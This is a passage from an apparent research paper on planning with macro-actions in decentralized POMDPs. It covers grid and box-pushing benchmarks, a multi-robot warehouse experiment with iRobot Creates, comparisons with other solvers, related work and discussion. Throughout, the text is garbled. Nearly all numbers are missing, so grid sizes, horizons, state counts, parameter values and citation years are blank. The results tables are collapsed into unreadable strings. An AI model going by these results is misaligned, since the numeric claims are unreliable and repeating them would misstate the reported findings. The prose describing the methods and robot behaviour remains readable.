has been reached. the value of the k-th sample-based trajectory starting at s and using policy π is given by v π,k(s ) = r k + . . . + γ trkt , where r k t is the reward given to the team on the t-th step. after k trajectories, v̂ π(s ) = ∑k k= v π,k(s ) k . amato, konidaris, kaelbling & how as the number of samples increases, the estimate of the policy’s value will approach the true value. this sample-based evaluation is necessary in large or continuous state spaces. sample-based evaluation has been used in the dec-pomdp case (wu, zilberstein, & chen, b; liu, amato, liao, carin, & how, ), but we extend the idea to the macro-action case where there is the added benefit of abstracting away the details of the macro-action policies. in the multi-robot case, given the macro-actions, macro-observations and simulator, our off-line planners can automatically generate a solution which optimizes the value function with respect to the uncertainty over outcomes, sensor information, and other robots. the planner generates the solution in the form of a set of policy trees (as in figure ) which are parsed into a corresponding set of smach controllers (bohren, ), one for each robot. smach controllers are hierarchical state machines for use in a ros (quigley, conley, gerkey, faust, foote, leibs, wheeler, & ng, ) environment. just like the policy trees they represent, each node in the smach controller represents a macro-action which is executed on the robot (e.g., navigation to a waypoint or wait for another robot) and each edge corresponds to a macro-observation. our system can automatically generate smach controllers—which are typically designed by hand—for complex, general multi- robot systems. . experiments we test the performance of our macro-action-based algorithms in simulation, using existing benchmarks, a larger domain, and in a novel multi-robot warehousing domain. . simulation experiments for the simulation experiments, we test on a common dec-pomdp benchmark, a four agent extension of this benchmark, and a large problem inspired by robot navigation. our algo- rithms were run on a single core . ghz machine with gb of memory. for option-based mbdp (o-mbdp), heuristic policies for the desired lengths were generated by producing random policies and keeping the joint policy with the highest value at the initial state. sampling was used ( simulations) to determine if a policy will terminate before the horizon of interest. . . an existing dec-pomdp problem: meeting in a grid the meeting-in-a-grid problem is an existing two-agent dec-pomdp benchmark in which agents receive reward unless they are both in one of two corners in a x grid (amato et al., ). agents can move up, down, left, right or stay in place, but transitions are noisy, so an agent may move to an adjacent square rather than its desired location. each agent has full observability of its own location, but cannot observe the other agent (even when they share the same grid square). we defined two options for each agent: each one moving the agent to one of the two goal corners. options are valid in any (local) state and terminate when they reach the appropriate goal corner. an agent stays in a corner on a step by choosing the appropriate option again. macro-observations are the agent’s location (they are the same as the primitive observations, but the agent only observes modeling and planning with macro-actions in decentralized pomdps va lu e horizon o-dp o-mbdp( ) decrspi mbdp( ) fb-hsvi ti m e (s ) horizon o-dp o-mbdp( ) decrspi mbdp( ) fb-hsvi figure : value and time results for the meeting in a grid dec-pomdp benchmark includ- ing leading dec-pomdp approaches decrspi and mbdp as well as option-based dp and mbdp. it’s updated location after completion of a macro-action). it is clear that these options provide the important macro-actions for the agents and navigation is possible based on local information in this problem. while this is a very small problem, it allows for direct comparison with dec-pomdp methods. results for this problem are split between figure and table because not all results are available for all algorithms. we compared against one leading optimal dec-pomdp al- gorithm, feature-based heuristic search value iteration (fb-hsvi) (dibangoye et al., ), and three leading approximate dec-pomdp algorithms: mbdp with incremental policy generation (mbdp-ipg) (amato et al., ), rollout sampling policy iteration (decr- spi) (wu et al., a) and trial-based dynamic programming (tbdp) (wu et al., b). maxtrees = was used in both o-mbdp and mbdp-ipg (referred to as mbdp in the figure and table). results for other algorithms are taken from their respective publications. as such, results were generated on different machines, but the trends should remain the same. the left figure shows that all approaches achieve approximately the same value, but option-based dp (o-dp) cannot solve horizons longer than without running out of memory. impressively, fb-hsvi is able to scale to horizon by not explicitly represent- ing a policy and maintaining a compressed distribution over agent histories and the state. nevertheless, since fb-hsvi is an optimal method, it becomes intractable as the horizon grows (it would be an interesting area of future research to see how macro-actions could be combined with the compressed representation of fb-hsvi). the right figure shows the time required for different horizons. all approaches run quickly for small horizons, but decrspi required an intractable amount of time as the horizon grows. the table shows time and value results for larger horizons. again, all approaches achieve similar values, but o-mbdp is much faster than mbdp-ipg or tbdp. the benefit of using a macro-action representa- tion can be seen most directly by comparing o-mbdp and mbdp, which are both based on the same algorithm: there is a significant improvement in running time, while solution quality is maintained. amato, konidaris, kaelbling & how value time (s) h = h = h = h = o-mbdp( ) . . mbdp( ) . . tbdp . . table : times and values for larger horizons on the meeting in a grid benchmark. val size o-dp . e- . o-mbdp . . . time size o-dp . . . o-mbdp . . . . . . . . . . x va lu e horizon o-dp o-mbdp x ti m e (s ) horizon o-dp o-mbdp figure : -agent meeting in a grid results showing (a) value and (b) running time on a × grid. . . larger grids with more agents to test the scalability of these approaches, we consider growing the meeting-in-a-grid bench- mark to a larger grid size and a larger number of agents. that is, agents still receive zero reward unless all agents are in one of the goal corners. the same options and macro- observations are used as in the x version of the problem. we generated results for several four-agent problems with random starting locations for each agent. we did not compare with current optimal or approximate dec-pomdp methods because, while they may be theoretically applicable, current implementations cannot solve problems with more than two agents or the methods assume structure (e.g., factorization or independence) that is not present in our problem. results for option-based dynamic programming and mbdp on problems with a × grid are shown in figure . three trees were used for o-mbdp. it is worth noting that these are very large problems with states. also, the -agent version of the problem is actually much harder than the -agent problem in section . . , because all agents must be in the same square to receive any reward (rather than just ) and the grid is much larger ( x rather than x ). agents are randomly initialized, but for horizon , it may be impossible for all agents to reach each other in the given time. by horizon (the largest we solved), the agents can often reach each other, but just at the later horizons due to noise and the large grid. for instance, an optimal solution to a deterministic version of this problem (an upper bound for the stochastic problem we use) for horizon is approximately modeling and planning with macro-actions in decentralized pomdps . the dynamic programming method is able to solve problems with a long enough horizon to reach the goal (producing positive value), but higher horizons are not solvable. the mbdp-based approach is able to solve much larger horizons, requiring much less time than o-dp. o-mbdp is able to produce near-optimal values for horizons that are also solvable by o-dp, but results may be further from optimal as the horizon grows (as is often the case with mbdp-based approaches). . . two-agent namo we also consider a two-agent version of the problem of robots navigating among movable obstacles (stilman & kuffner, ). here, as shown in figure , both agents are trying to reach a goal square (marked by g), but there are obstacles in the way. each robot can move in four directions (up, down, left and right) or use a ‘push’ action to attempt to move a box to a specific location (diagonally down to the left for the large box and into the corner for both small boxes). the push action fails and the robot stays in place when the robot is not in front of the box. robots can move the small boxes (b and b ) by themselves, but must move the larger box (b ) together. observations are an agent’s own location (but not the location of the other agent) and whether the large box or the same numbered box has been moved (i.e., agent can observe box and agent can observe box ). there is noise in both navigation and in box movement: movement is successful with probably . and pushing the small and large boxes is successful with probably . and . , respectively. to encourage the robots to reach the goal as quickly as possible, there is a negative reward (- ) when any agent is not in the goal square. four options were defined for each agent. these consisted of ) moving to a designated location to push the big box, ) attempting to push the large box, ) pushing the designated small box (box for agent and box for agent ) to the corner square, and ) moving to the goal. the option of moving to the goal is only valid when at least one box has been moved and movement of any box is only valid if the large box and the agent’s designated box has not yet been moved. movement options terminate at the desired location and pushing options terminate with the box successfully or unsuccessfully moved. macro-observations were the same as primitive observations (the agent’s location and box movements). these options provide high-level choices for the agents to coordinate on this problem, while ab- stracting away the navigation tasks to option execution. options for just moving to the small boxes could also be incorporated, but were deemed unnecessary because coordination is unnecessary for pushing the small boxes. results for option-based dynamic programming are given in figure . here, o-dp performs very well on a range of different problem sizes and horizons. because negative reward is given until both agents are in the goal square, more steps are required to reach the goal as the problem size increases. the agents will stay in the goal upon reaching it, causing the value to plateau. as shown in the top figure, o-dp is able to produce this policy for the different problem sizes and horizons. the running times for each of the grid sizes ( × to × ) are shown in the bottom figure for the horizon problem. here, we see the running time increases for larger state spaces but the growth is sublinear. a comparison with other dec-pomdp algorithms (including o-mdbp) is shown in table . for tbdp and gmaa-ice* (a leading optimal dec-pomdp algorithm) (oliehoek amato, konidaris, kaelbling & how b g b b figure : a x two-agent namo problem. - - . - - . . . value size size size size time ti m e (s ) - - - - value va lu e horizon size size size size size time ti m e (s ) horizon size size size size size ? size size size size size chart ti m e (s ) number of states o-dp horizon figure : value and time results for o-dp in the two-agent namo problem for various size grids (where size is the length of a single side) et al., ), the grid size was increased while at least horizon could be solved and then the horizon was increased until it reached . results for these algorithms were provided by personal communication with the authors and run on other machines, but the trends remain the same. for o-mbdp, trees were used because smaller numbers resulted in poor performance, but parameters were not exhaustively evaluated. the results show that tbdp is able to solve the × problem, but runs out of memory when trying to solve any × problems. gmaa*-ice can solve larger problem sizes, but runs out of memory for larger horizons. gmaa*-ice scales better with the increased state space because it is able to exploit the factorization of the problem, but is limited to very small horizons because it is solving the underlying dec-pomdp optimally. the inability for current approaches to solve these problems is not surprising given their size. by contrast, o-dp is able to solve the × problem which has over million states states while o-mbdp solves the × problem that has has million states. o-mbdp is able to solve even larger problems, but we did not analyze its performance beyond the × problem. . larger problem sizes were not tested for gmaa*-ice, but some may be solvable. note that for any problem larger than × horizons beyond are not solvable and the running time is already high for the × case. modeling and planning with macro-actions in decentralized pomdps num. of states h value time (s) o-dp . × − . o-mbdp( ) × − . gmaa*-ice , − tbdp , − . table : largest representative namo problems solvable by each approach. for gmaa*- ice and tbdp problem size was increased until horizon was not solvable. figure : the multi-robot warehouse domain with depots and robots labeled. . multi-robot experiments we also tested our methods in a warehousing scenario using a collection of irobot creates (figure ) where we varied the communication capabilities available to the robots. the re- sults demonstrate that our methods can automatically generate the appropriate motion and communication behavior while considering uncertainty over outcomes, sensor information and other robots. . . the warehouse domain we consider three robots in a warehouse that are tasked with finding and retrieving boxes of two different sizes: large and small. robots can navigate to known depot locations (rooms) to retrieve boxes and bring them back to a designated drop-off area. the larger boxes can only be moved effectively by two robots (if a robot tries to pick up the large box by itself, it will move to the box, but fail to pick it up). while the locations of the depots are known, the contents (the number and type of boxes) are unknown. in our implementation, we assumed there were three boxes (one large and two small), each of which was equally likely to be in one of two depots. our planner generates a smach controller for each of the robots off-line using our option-based algorithms. these controllers are then executed online in a decentralized manner. amato, konidaris, kaelbling & how in each scenario, we assumed that each robot could observe its own location, see other robots if they were within (approximately) one meter, observe the nearest box when in a depot and observe the size of the box if it is holding one (defining the resulting macro- observations). in the simulator used by the planner to evaluate solutions, the resulting state space includes the location of each robot (discretized into nine possible locations) and the location of each of the boxes (in a particular depot, with a particular robot or at the goal). in particular, there are ∏ i∈i locagi× ∏ b∈b locbb states, where locagi is the location of an agent and is discretized to a x grid and locbb represents the location of each of boxes (at a depot, with a robot, at a goal, or with a pair of robots), with the size of locbb for all b is numdepots + numagents + numgoals + numagents∗numagents where we set numdepots = , numagents = and numgoals = . the primitive actions are to move in four different directions as well as pickup, drop and communication actions. the macro-actions and macro-observations vary a bit for each scenario, but are detailed in the sections below. note that this primitive state and action representation is used for evaluation purposes and not actually implemented on the robots (which just utilize the smach controllers). higher fidelity simulators could also be used, but running time may increase if the simulations are computationally intensive (average solution times for the policies presented below were approximately one hour). the three-robot version of this scenario has , , states, which is several orders of magnitude larger than problems typically solvable by dec-pomdp approaches. these problems are solved using the option- based mbdp algorithm initialized with a hand coded heuristic policy. navigation has a small amount of noise in the amount of time required to move to locations (reflecting the real-world dynamics): this noise increases when the robots are pushing the large box (reflecting the need for slower movements and turns in this case). specifically, the robots were assumed to transition to the desired square deterministically with no boxes, with probability . with the small box and with probability . with the large box. picking up boxes and dropping them was assumed to be deterministic. these noise parameters were assumed to be known in this work, but they could also be learned by executing macro-actions multiple times in the given initiation sets. note that the macdec- pomdp framework is very general so other types of macro-actions and observations could also be used (including observation of other failures). more details about each scenario are given below. . . scenario : no communication in the first scenario, the robots cannot communicate with each other. therefore, all coop- eration is based on the controllers that are generated by the planner (which were generated offline) and observations of the other robots (when executing online). the macro-actions were: go to depot , go to depot , go to the drop-off area, pick up the small box, pick up the large box, and drop off a box. . our state representation technically has , , , states, since we also include observations of each agent (of which there are in this version of the problem) in the state space. . these parameters and controllers were loosely based on the actual robot navigation and box pushing. other work has looked at more directly determining these models and parameters (amato, konidaris, anders, cruz, how, & kaelbling, ; omidshafiei et al., ). modeling and planning with macro-actions in decentralized pomdps (a) two robots set out for differ- ent depots. (b) robots observe boxes in de- pots (large on left, small on right). (c) white robot moves to the large box and green robot moves to the small one. (d) the white robot waits at the large box while green robot pushes the small box. (e) green robot drops the box off at the goal. (f) the green robot goes to depot and sees the other robot and large box. (g) green robot moves to help the white robot. (h) the green robot moves to the box and the two robots push it back to the goal. figure : scenario (no communication). the depot macro-actions are applicable anywhere and terminate when the robot is within the walls of the appropriate depot. the drop-off and drop macro-actions are only applicable if the robot is holding a box, and the pickup macro-actions are only applicable when the robot observes a box. picking up the small box was assumed to succeed determin- istically, but the model could easily be adjusted if the pickup mechanism is less robust. the macro-observations are the basic ones defined above: the robot can observe it’s own location ( discrete positions), whether there is another robot present in the location, observe the nearest box when in a depot (small, large or none) and observe the size of the box if it is holding one (small, large or none). the macro-actions correspond to natural choices for robot controllers. this case (seen in figure along with a depiction of the executed policy in figure ) uses only two robots to more clearly show the optimized behavior in the absence of communication. the robots begin in the drop-off area and the policy generated by the planner begins by assigning one robot to go to each of the depots (seen in figure (a)). the robots then observe the contents of the depots they are in (seen in figure (b)). if . all videos can be seen at http://youtu.be/fguhthh-jna amato, konidaris, kaelbling & how d m ps d d m d m d m goal g m , d m dr m pl goal g m , d m dr , d , goal , , d , goal m pl goal g m , d m dr , , d , goal , d , d d [repeat for more steps ] macro-actions d =depot d =depot g=goal (drop-off area) ps=pick up small box pl=pick up large box dr=drop box figure : path executed in policy trees for the no communication scenario by the white robot (left) and the green robot (right). only macro-actions executed (nodes) and observations seen are shown. observations are shown pictorially, with the box sizes (small as a square and large as a rectangle) and robots (white create) given along the corresponding edge. there is only one robot in a depot and there is a small box to push, the robot will push the small box (figures (c) and (d)). if the robot is in a depot with a large box and no other robots, it will stay in the depot, waiting for another robot to come and help push the box (figure (d)). in this case, once the other robot is finished pushing the small box (figure (e)), it goes back to the depots to check for other boxes or robots that need help (figure (f)). when it sees another robot and the large box in the depot on the left (depot ), it attempts to help push the large box (figure (g)) and the two robots are successful pushing the large box to the goal (figure (h)). the planner has automatically derived a strategy for dynamic task allocation—two robots go to each room, and then search for help needed after pushing any available boxes. this behavior was generated by an optimization process that considered the different costs of actions and the uncertainty involved (in the current step and into the future) and used those values to tailor the behavior to the particular problem instance. modeling and planning with macro-actions in decentralized pomdps (a) the three robots begin moving to the waiting room. (b) one robot goes to depot and two robots go to depot . the de- pot robot sees a large box. (c) the robot saw a large box, so it moved to the waiting room while the other robots pushed the small boxes. (d) the depot robot waits while the other robots push the small boxes. (e) the two robots drop off the small boxes at the goal while the other robot waits. (f) the green robot goes to the waiting room to check for signals and the white robot sends signal # . (g) signal # is interpreted as a need for help in depot , so they move to depot and push the large box. (h) the two robots in depot push the large box back to the goal. figure : scenario (limited communication). . . scenario : local communication in scenario , robots can communicate when they are within one meter of each other. the macro-actions are the same as above, but we added ones to communicate and wait for communication. the resulting macro-action set is: go to depot , go to depot , go to the drop-off area, pick up the small box, pick up the large box, drop off a box, go to an area between the depots (the "waiting room"), send signal # , send signal # , and wait in the waiting room for another robot. here, we allow the robots to choose to go to a “waiting room” which is between the two depots. this permits the robots to possibly communicate or receive communications before committing to one of the depots. the waiting-room macro-action is applicable in any situation and terminates when the robot is between the waiting room walls. the depot macro-actions are now only applicable in the waiting room, while the drop-off, pick up and drop macro-actions remain the same. the wait macro-action is applicable in the amato, konidaris, kaelbling & how waiting room and terminates when the robot observes another robot in the waiting room. the signaling macro-actions are applicable in the waiting room and are observable by other robots that are within approximately a meter of the signaling robot. the macro-observations are the same as in the previous scenario, but now include observations for the two signals. note that we do not specify how each communication signal should be interpreted, or when they should be sent. the results for this three-robot domain are shown in figure . the robots go to the waiting room (figure (a)) and then two of the robots go to depot (the one on the right) and one robot goes to depot (the one on the left) (figure (b)). because there are three robots, the choice for the third robot is random while one robot will always be assigned to each of the depots. because there is only a large box to push in depot , the robot in this depot goes back to the waiting room to try to find another robot to help it push the box (figure (c)). the robots in depot see two small boxes and they choose to push these back to the goal (also figure (d)). once the small boxes are dropped off (figure (e)) one of the robots returns to the waiting room and then is recruited by the other robot to push the large box back to the goal (figures (f) and (g)). the robots then successfully push the large box back to the goal (figure (h)). in this case, the planning process determines how the signals should be used to perform communication. . . scenario : global communication in the last scenario, the robots can use signaling (rather than direct communication). in this case, there is a switch in each of the depots that can turn on a blue or red light. this light can be seen in the waiting room and there is another light switch in the waiting room that can turn off the light. (the light and switch were simulated in software and not incorporated in the physical domain.) the macro-actions were: go to depot , go to depot , go to the drop-off area, pick up the small box, pick up the large box, drop off a box, go to the "waiting room", turn on a blue light, turn on a red light, and turn off the light. the first seven macro-actions are the same as for the communication case except we relaxed the assumption that the robots had to go to the waiting room before going to the depots (making both the depot and waiting room macro-actions applicable anywhere). the macro-actions for turning the lights on are applicable in the depots and the macro-actions for turning the lights off are applicable in the waiting room. the macro-observations are the same as in the previous scenario, but the two signals are now the lights instead of the communication signals. while the lights were intended to signal requests for help in each of the depots, we did not assign a particular color to a particular depot. in fact, we did not assign them any meaning at all, allowing the planner to set them in any way that improves performance. the results are shown in figure . because one robot started ahead of the others, it was able to go to depot to sense the size of the boxes while the other robots go to the waiting room (figure (a)). the robot in depot turned on the light (red in this case, but not shown in the images) to signify that there is a large box and assistance is needed (figure (b)). the green robot (the first other robot to the waiting room) sees this light, interprets it as a need for help in depot , and turns off the light (figure (c)). the other modeling and planning with macro-actions in decentralized pomdps (a) one robot starts first and goes to depot while the other robots go to the waiting room. (b) the robot in depot sees a large box, so it turns on the red light (the light is not shown). (c) the green robot sees light first, turns it off, and goes to depot . the white robot goes to depot . (d) robots in depot move to the large box, while the robot in depot begins pushing the small box. (e) robots in depot begin push- ing the large box and the robot in depot pushes a small box to the goal. (f) the robots from depot suc- cessfully push the large box to the goal. figure : scenario (signaling). robot arrives in the waiting room, does not observe a light on and moves to depot (also figure (c)). the robot in depot chooses to push a small box back to the goal and the green robot moves to depot to help the other robot (figure (d)). one robot then pushes the small box back to the goal while the two robots in depot begin pushing the large box (figure (e)). finally, the two robots in depot push the large box back to the goal (figure (f)). this behavior is optimized based on the information given to the planner. the semantics of all these signals as well as the movement and signaling decisions were decided on by the planning algorithm to maximize value. . . simulation results we also evaluated the multi-robot experiments in the simulator to evaluate the difference in performance between option-based mbdp (o-mbdp) and option-based direct cross entropy policy search (o-dice). option-based dynamic programming is not scalable enough to solve the domains to the horizons considered. for o-mbdp, maxtrees = , which was chosen to balance solution quality and running time. for o-dice, iter = , n = , nb = , and α = . , which were chosen based on suggestions from the original work (oliehoek et al., ). a version of o-dice was also implemented that, rather than maintaining sampling distributions for the whole tree, only maintains a single sampling distribution that is used at each node in the tree. this later version of o-dice is referred to as o-dice ( ) and can be thought of as a biased form of monte carlo sampling. as can be seen in table , o-dice outperforms o-mbdp in terms of both value and time. in all cases, versions of o-dice are more scalable than o-mbdp, even though only trees were used for o-mbdp. for problems in which both o-mbdp and o-dice amato, konidaris, kaelbling & how no communication o-mbdp( ) o-dice ( ) o-dice (full) value time (s) value time (s) value time (s) horizon horizon horizon . . . horizon − − . . horizon − − . . communication o-mbdp( ) o-dice ( ) o-dice (full) value time (s) value time (s) value time (s) horizon . . . horizon . . . horizon . ∗ . . horizon − − . . horizon − − − − − − signalling o-mbdp( ) o-dice ( ) o-dice (full) value time (s) value time (s) value time (s) horizon . . . horizon . . . horizon . . . horizon − − . . horizon − − . . table : multi-robot warehouse simulation results for option-based mbdp (o-mbdp) and option-based direct cross entropy search (o-dice) using parameters for full his- tories (full) or just a single value ( ). value and time in seconds is given with − signifying the algorithm runs out of memory before generating any valid solution and ∗ signifying the algorithm runs out of memory before completion. could produce solutions, the values were very similar, but the o-dice methods required significantly less time. o-mbdp either runs out of memory (due to the large number of trees generated during a backup step) or takes a really long time to generate the maxtrees trees. using more efficient versions of mbdp (e.g., wu et al., a) should improve performance, but performance improvements could also be made to o-dice. an extensive comparison has not been conducted between these algorithms even for primitive action dec-pomdp domains, but we expect that performance will depend on the domain and parameters used modeling and planning with macro-actions in decentralized pomdps (e.g., heuristics in mbdp). the full version of o-dice was able to outperform the single parameter version of o-dice in terms of value, but also required more time. . . infinite horizon comparisons unlike pomdps, dec-pomdp finite-horizon methods are typically not scalable enough to solve large or infinite-horizon problems. as a consequence, special-purpose infinite-horizon methods have been developed which typically use a finite-state controller policy represen- tation instead of a policy tree. the finite-state controller allows memory to be bounded. as a consequence, finite-state controller-based methods are typically more scalable for large horizon problems, but perform poorly for smaller horizons. finite-state controllers, which condition action selection on an internal memory state, have been widely used in dec-pomdps (bernstein et al., ; amato, bernstein, & zil- berstein, a; amato, bonet, & zilberstein, b; pajarinen & peltonen, ; wu et al., ; kumar, zilberstein, & toussaint, ; kumar, mostafa, & zilberstein, ). finite-state controllers operate in the same way as policy trees in that there is a designated initial node and following action selection at that node, the controller transitions to the next node depending on the observation seen. this continues for the infinite steps of the problem. finite-state controllers explicitly represent infinite-horizon policies, but can also be used for finite-horizon policies. recently, we and others have extended the ideas of macro-actions from this paper to use finite-state controller representations. in particular, heuristic search (amato et al., ) and a dice-based approach (omidshafiei et al., ) have been explored. g-dice (omidshafiei et al., ) is the same as o-dice except it is applied to the finite-state controller representation rather than the tree. the heuristic search method from (amato et al., ) is similar to multi-agent a* approaches (oliehoek et al., ; szer, charpillet, & zilberstein, ; oliehoek, spaan, & vlassis, ; oliehoek, whiteson, & spaan, ), but again is applied to the finite-state controller representation rather than the tree. it is worth noting that the key difference is the policy representation and the algorithms in this paper could be applied to finite-state controllers and many finite-state controller- based methods could be applied to trees. this paper introduces macro-actions in dec- pomdps and explores some initial algorithms for tree-based solutions; many future algo- rithms are now possible. nevertheless, for thoroughness of results, we provide the performance of the heuristic search method mdhs (amato et al., ) on our benchmark problems. mdhs is an anytime algorithm, so it will continue to improve until the best parameters for the given controller size are found. for a fair comparison, we let it run for the same amount of time as the full version of o-dice. we set the parameters in the same way as the previous work (amato et al., ) (e.g., controller nodes were used) and the initial lower bound was found from the best of random controller parameterizations. reporting results for all horizons of all domains becomes redundant, but the results we provide are representative of the other domains and horizon values. as can be seen in table , mdhs often achieves values that are similar to the o- dice values, but sometimes significantly underperforms the other method. for instance, mdhs can only achieve % of the o-dice value in the meeting in a grid problem with amato, konidaris, kaelbling & how meeting in a grid agents, hor= agents, hor= agents, hor= value time (s) value % o-dice value % o-dice . % . % . % namo size size size value % o-dice value % o-dice value % o-dice horizon − % − % − % horizon − . % − % − % horizon − . % − . % − . % robot warehouse no communication communication signaling value % o-dice value % o-dice value % o-dice horizon % . % . % horizon % . % . % horizon . % . % . % horizon . % . % . % horizon . % − − . % table : results for the controller-based mdhs method on our benchmark problems along with the performance relative of o-dice (full). agents, % of the o-dice value is produced in the horizon robot warehouse problem with signaling and % and % of the o-dice value is produced in the horizon and warehouse problems with communication. the values for the namo problems are not particularly interesting as all policies have the same value until the horizon becomes significantly longer than the domain size (since the agent requires more steps to reach the goal as the domain size increase), but we still see that mdhs does not achieve the full o-dice values for non-degenerate horizons. in general, mdhs is more scalable in terms of the horizon (e.g., solving the horizon robot warehouse problem with communication), but scalability depends on choosing a proper controller size to balance solution quality and computational efficiency. as a result, controller-based methods, such as mdhs, can return lower quality solutions on horizons that are solvable by the tree-based methods. mdhs will also require an intractable amount of time to improve solutions as the number of observations grows since it searches for assign- ments for all possible next observations in the controller (omidshafiei et al., ). as is currently the case in (primitive) dec-pomdps, tree-based and controller-based algorithms both have their place in macro-action-based dec-pomdps. the performance of mdhs (or controller-based methods more generally) relative to tree-based methods is very problem modeling and planning with macro-actions in decentralized pomdps and horizon dependent (as seen in our results). a general rule of thumb may be to use a tree-based method for finite-horizon problems that are solvable and to use controller-based (or other methods) otherwise. . related work while many hierarchical approaches have been developed for multi-agent systems (hor- ling & lesser, ), very few are applicable to multi-agent models based on mdps and pomdps. perhaps the most similar approach is that of ghavamzadeh et al. (ghavamzadeh, mahadevan, & makar, ). this is a multi-agent reinforcement learning approach with a given task hierarchy where communication is used to coordinate actions at higher levels and agents are assumed to be independent at lower levels. this work was limited to a multi- agent mdp model with (potentially costly) communication, making the learning problem challenging, but the planning problem is simpler than the full dec-pomdp case. other approaches have considered identifying and exploiting independence between agents to limit reasoning about coordination and improve scalability. approaches in- clude general assumptions about agent independence like transition independent dec-mdps (becker, zilberstein, lesser, & goldman, b) and factored models such as nd-pomdps (nair et al., ) as well as methods that consider coordination based on ‘events’ or states. events which may require or allow interaction have been explored in dec-mdps (becker, lesser, & zilberstein, a) and (centralized) multi-robot systems (messias, spaan, & lima, ). other methods have considered locations or states where interaction is needed to improve scalability in planning (spaan & melo, ; velagapudi et al., ) and learn- ing (melo & veloso, ). the work on independence assumes agents are always independent or coordinate using a fixed factorization, making it less general than an option-based approach. the work on event and state-based coordination focuses on a different type of domain knowledge: knowledge of states where coordination takes place. while this type of knowledge may be available, it may be easier to obtain and utilize procedural knowledge. the domain may therefore be easier to specify using macro-actions with different properties (such as independence or tight coordination), allowing planning to determine the necessary states for coordination. furthermore, this type of state information could be used to define options for reaching these coordination points. lastly, macro-actions could possibly be used in conjunction with previous methods, further improving scalability. as mentioned in the introduction, we do not target scalability with respect to the number of agents. several such methods have been developed that make various assumptions about agent abilities and policies (e.g., sonu, chen, & doshi, ; varakantham, adulyasak, & jaillet, ; velagapudi et al., ; oliehoek et al., ; nguyen, kumar, & lau, a, b). macro-action-based methods could potentially be incorporated into these methods to again increase scalability in terms of both the number of agent as well as the horizon and other problem variables. there are several frameworks for multi-robot decision making in complex domains. for instance, behavioral methods have been studied for performing task allocation over time with loosely-coupled (parker, ) or tightly-coupled (stroupe, ravichandran, & balch, amato, konidaris, kaelbling & how ) tasks. these are heuristic in nature and make strong assumptions about the type of tasks that will be completed. linear temporal logic (ltl) has also been used to specify robot behavior (belta, bic- chi, egerstedt, frazzoli, klavins, & pappas, ; loizou & kyriakopoulos, ); from this specification, reactive controllers that are guaranteed to satisfy the specification can be derived. these methods are appropriate when the world dynamics can be effectively described non-probabilistically and when there is a useful characterization of the robot’s desired behavior in terms of a set of discrete constraints. when applied to multiple robots, it is necessary to give each robot its own behavior specification. in contrast, our approach (probabilistically) models the domain and allows the planner to automatically optimize the robots’ behavior. market-based approaches use traded value to establish an optimization framework for task allocation (dias & stentz, ; gerkey & matarić, ). these approaches have been used to solve real multi-robot problems (kalra, ferguson, & stentz, ), but are largely aimed to tasks where the robots can communicate through a bidding mechanism. emery-montemerlo et al. (emery-montemerlo, gordon, schneider, & thrun, ) in- troduced a (cooperative) game-theoretic formalization of multi-robot systems which resulted in solving a dec-pomdp. an approximate forward search algorithm was used to generate solutions, but because a (relatively) low-level dec-pomdp was used scalability was limited. their system also required synchronized execution by the robots. . discussion we have considered local options in this paper, but our framework could support other types of options. for example, we could consider options in which the policy is local but the initiation and termination sets are not—for example, initiation and termination could depend on the agent’s history, or other agent’s states. generalizing a local option in this way retains the advantages described here, because the decision about which option to execute already requires coordination but executing the option itself does not. we could also use options with history-based policies, or define multi-agent options that control a subset of agents to complete a task. in general, we expect that an option will be useful for planning when its execution allows us to temporarily ignore some aspect of the original problem. for example, the option might be defined in a smaller state space (allowing us to ignore the full complexity of the problem), or use only observable information (allowing us to ignore the partially observable aspect of the problem), or involve a single agent or a subset of agents communicating (allowing us to ignore the decentralized aspect of the problem). we can gain additional benefits by exploiting known structure in the multi-agent prob- lem. for instance, most controllers only depend on locally observable information and do not require coordination. for example, consider a controller that navigates to a waypoint. only local information is required for navigation—the robot may detect other robots but their presence does not change its objective, and it simply moves around them—but choos- ing the target waypoint likely requires the planner to consider the locations and actions of all robots. macro-actions with independent execution allow coordination decisions to be made only when necessary (i.e., when choosing macro-actions) rather than at every time step. because macdec-pomdps are built on top of dec-pomdps, macro-action choice modeling and planning with macro-actions in decentralized pomdps may depend on history, but during execution macro-actions may depend only on a single observation or on any number of steps of history, or even represent the actions of a set of robots. that is, macro-actions are very general and can be defined in such a way to take advantage of the knowledge available to the robots during execution. we have so far assumed that the agent is given an appropriate set of macro-actions with which to plan. in all of our domains, there were quite natural choices for macro-actions and macro-observations (e.g., navigating to depots and observing that you are in a depot along with its contents), but such natural representations are not always present. research on skill discovery (mcgovern & barto, ) has attempted to devise methods by which a single agent can instead acquire an appropriate set of options autonomously, through interaction with its (fully observable) environment. while some of these methods may be directly applicable, the characteristics of the partially observable, multi-agent case also offer new opportunities for skill discovery. for example, we may wish to synthesize skills that collapse uncertainty across multiple agents, perform coordinated multi-agent actions, communicate essential state information, or allow agents to synchronize and replan. related work has begun to explore some of these topics (omidshafiei et al., , a), but many open questions remain. in terms of multi-robot domains, we demonstrated macro-action-based approaches on multiple other domains with limited sensing and communication. these other domains included a logistics (beer delivery) domain, where two robots must efficiently find out about and service beer orders in cooperation with a ‘picker/bartender’ robot, which can retrieve items (amato, konidaris, anders, cruz, how, & kaelbling, ; amato et al., ), a package delivery domain, where a group of aerial robots must retrieve and deliver packages from base locations to delivery locations while dealing with limited battery life (omidshafiei, agha-mohammadi, amato, & how, ; omidshafiei, agha-mohammadi, amato, liu, how, & vian, ; omidshafiei et al., a, ) as well as an adversarial domain in which a team of robots is playing capture the flag against another team of robots (hoang, xiao, sivakumar, amato, & how, ). also, our results have shown that the use of macro-actions can significantly improve scalability—for example, by allowing us to use larger grids with the same set of agents and obstacles in the namo problem (see figure ). however, in such cases—where the state space grows but the number of agents and significant interactions does not—we should in principle be able to deal with any size grid with no increase in computation time, because the size of the grid is irrelevant to the coordination aspects of the problem. this does not occur in the work presented here because we plan in the original state space; methods for constructing a more abstract task-level representation (konidaris, kaelbling, & lozano- perez, ) could provide further performance improvements. it is also worth noting that our approach can incorporate state-of-the-art methods for solving more restricted scenarios as options. the widespread use of techniques for solving restricted robotics scenarios has led to a plethora of usable algorithms for specific problems, but no way to combine these in more complex scenarios. our approach can build on the large amount of research in single and multi-robot systems that has gone into solving difficult problems such as navigation in a formation (balch & arkin, ), cooperative transport of an object (kube & bonabeau, ), coordination with signaling (beckers, holland, & deneubourg, ) or communication under various limitations (rekleitis, lee-shue, new, amato, konidaris, kaelbling & how & choset, ). the solutions to these problems could be represented as macro-actions in our framework, building on existing research to solve even more complex multi-robot problems. this paper focused on (sample-based) 